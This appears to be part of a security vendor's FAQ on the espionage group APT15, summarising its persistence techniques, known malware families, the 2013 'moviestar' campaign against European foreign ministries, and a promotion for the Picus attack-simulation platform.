APT15 establishes persistence through registry modifications, scheduled tasks, and shortcut manipulation. The group creates .lnk shortcut files in the Startup folder and utilizes the Active Setup registry key to ensure malware executes automatically during the boot process. Scheduled tasks are also configured to launch malicious binaries upon user logon.

What specific malware families are associated with APT15?

APT15 utilizes a wide range of malware families, including BS2005, SilkBean, DoubleAgent, CarbonSteal, GoldenEagle, Ketrican, TidePool, RoyalCli, RoyalDNS, MirageFox, and Okrum. In late 2022, the group was observed using a backdoor named Graphican. The group also employs legitimate tools like Windows Command Shell for execution.

What was the "moviestar" campaign?

The “moviestar” campaign was a specific operation initiated by APT15 in August 2013. It involved Syria-themed attacks targeting Ministries of Foreign Affairs in Europe. This campaign preceded a G20 meeting in Russia that focused on the Syrian crisis and represents one of the major historical activities of the group.

How does the Picus Platform assist in defending against APT15?

Picus Platform helps organizations defend against cyber espionage groups by allowing users to simulate APT attacks. Users can utilize a 14-day free trial of Picus Platform to test security postures against the specific tactics, techniques, and procedures employed by threat actors like APT15.
